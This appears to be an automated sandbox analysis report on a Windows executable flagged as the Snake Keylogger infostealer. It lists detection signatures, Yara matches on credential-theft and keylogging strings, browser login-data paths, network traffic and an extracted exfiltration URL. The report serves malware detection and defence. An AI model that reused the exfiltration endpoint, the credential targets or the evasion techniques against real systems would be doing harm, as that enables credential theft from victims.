Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
58208 Teklif.exe

Overview

General Information

Sample name:58208 Teklif.exe
Analysis ID:1422217
MD5:dc59e080bc0be8cee52ec9e79ccc7e82
SHA1:22d8e9aab959c584acc896bfeed170ffa672f1cb
SHA256:95e4dd6cc5a341f4440a113e0a832175aa2f5baafd9c7483255a18088e1c2764
Tags:exegeoTUR
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 58208 Teklif.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\58208 Teklif.exe" MD5: DC59E080BC0BE8CEE52EC9E79CCC7E82)
    • 58208 Teklif.exe (PID: 7580 cmdline: "C:\Users\user\Desktop\58208 Teklif.exe" MD5: DC59E080BC0BE8CEE52EC9E79CCC7E82)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Url", "Exfil Url": "https://scratchdreams.tk/_send_.php?"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14881:$a1: get_encryptedPassword
      • 0x14b77:$a2: get_encryptedUsername
      • 0x1468d:$a3: get_timePasswordChanged
      • 0x14788:$a4: get_passwordField
      • 0x14897:$a5: set_encryptedPassword
      • 0x15e9f:$a7: get_logins
      • 0x15e02:$a10: KeyLoggerEventArgs
      • 0x15a9b:$a11: KeyLoggerEventArgsEventHandler
      00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x197d3:$x1: $%SMTPDV$
      • 0x1823a:$x2: $#TheHashHere%&
      • 0x1977b:$x3: %FTPDV$
      • 0x181ac:$x4: $%TelegramDv$
      • 0x15a9b:$x5: KeyLoggerEventArgs
      • 0x15e02:$x5: KeyLoggerEventArgs
      • 0x1979f:$m2: Clipboard Logs ID
      • 0x19989:$m2: Screenshot Logs ID
      • 0x19a55:$m2: keystroke Logs ID
      • 0x19961:$m4: \SnakeKeylogger\
      00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.58208 Teklif.exe.445b6e0.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.58208 Teklif.exe.445b6e0.7.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.58208 Teklif.exe.445b6e0.7.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12c81:$a1: get_encryptedPassword
            • 0x12f77:$a2: get_encryptedUsername
            • 0x12a8d:$a3: get_timePasswordChanged
            • 0x12b88:$a4: get_passwordField
            • 0x12c97:$a5: set_encryptedPassword
            • 0x1429f:$a7: get_logins
            • 0x14202:$a10: KeyLoggerEventArgs
            • 0x13e9b:$a11: KeyLoggerEventArgsEventHandler
            0.2.58208 Teklif.exe.445b6e0.7.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a49d:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x196cf:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19b02:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1ab41:$a5: \Kometa\User Data\Default\Login Data
            0.2.58208 Teklif.exe.445b6e0.7.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x13828:$s1: UnHook
            • 0x1382f:$s2: SetHook
            • 0x13837:$s3: CallNextHook
            • 0x13844:$s4: _hook
            Click to see the 26 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
            Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
            Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Url", "Exfil Url": "https://scratchdreams.tk/_send_.php?"}
            Multi AV Scanner detection for domain / URL
            Source: scratchdreams.tkVirustotal: Detection: 6%Perma Link
            Source: https://scratchdreams.tkVirustotal: Detection: 15%Perma Link
            Multi AV Scanner detection for submitted file
            Source: 58208 Teklif.exeReversingLabs: Detection: 52%
            Source: 58208 Teklif.exeVirustotal: Detection: 65%Perma Link
            Machine Learning detection for sample
            Source: 58208 Teklif.exeJoe Sandbox ML: detected
            Source: 58208 Teklif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.11:49711 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.11:49727 version: TLS 1.2
            Source: 58208 Teklif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: uVJY.pdb source: 58208 Teklif.exe
            Source: Binary string: uVJY.pdbSHA256N source: 58208 Teklif.exe
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 0141F7A1h3_2_0141F502
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_0141EA08
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9CC61h3_2_05A9C9B8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A91C31h3_2_05A91980
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9FC29h3_2_05A9F980
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A92658h3_2_05A92586
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A92091h3_2_05A91DE0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9F7D1h3_2_05A9F528
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A917D1h3_2_05A91520
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9C3B1h3_2_05A9C108
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9C809h3_2_05A9C560
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A91371h3_2_05A910C0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9F379h3_2_05A9F0D0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9EAC9h3_2_05A9E820
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A90F11h3_2_05A90C60
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9EF21h3_2_05A9EC78
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9021Dh3_2_05A90040
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A90BA7h3_2_05A90040
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9E671h3_2_05A9E3C8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9DDC1h3_2_05A9DB18
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9E219h3_2_05A9DF70
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9D969h3_2_05A9D6C0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9D0B9h3_2_05A9CE10
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A9D511h3_2_05A9D268
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 05A92658h3_2_05A92240
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD8D95h3_2_06BD8A58
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD6169h3_2_06BD5EC0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD88A9h3_2_06BD8600
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD5D11h3_2_06BD5A68
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD6E71h3_2_06BD6BC8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD65C1h3_2_06BD6318
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD6A19h3_2_06BD6770
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD774Ah3_2_06BD74A0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD0741h3_2_06BD0498
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD7BA1h3_2_06BD78F8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD0B99h3_2_06BD08F0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD72C9h3_2_06BD7020
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_06BD3808
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_06BD3803
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD02E9h3_2_06BD0040
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD8451h3_2_06BD81A8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD1449h3_2_06BD11A0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD5891h3_2_06BD55E8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD7FF9h3_2_06BD7D50
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 4x nop then jmp 06BD0FF1h3_2_06BD0D48

            Networking

            barindex
            Yara detected Generic Downloader
            Source: Yara matchFile source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 172.67.169.18 172.67.169.18
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.11:49711 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003074000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: 58208 Teklif.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: 58208 Teklif.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: 58208 Teklif.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
            Source: 58208 Teklif.exeString found in binary or memory: http://tempuri.org/DataSet1.xsdCEscolha
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
            Source: 58208 Teklif.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.11:49727 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
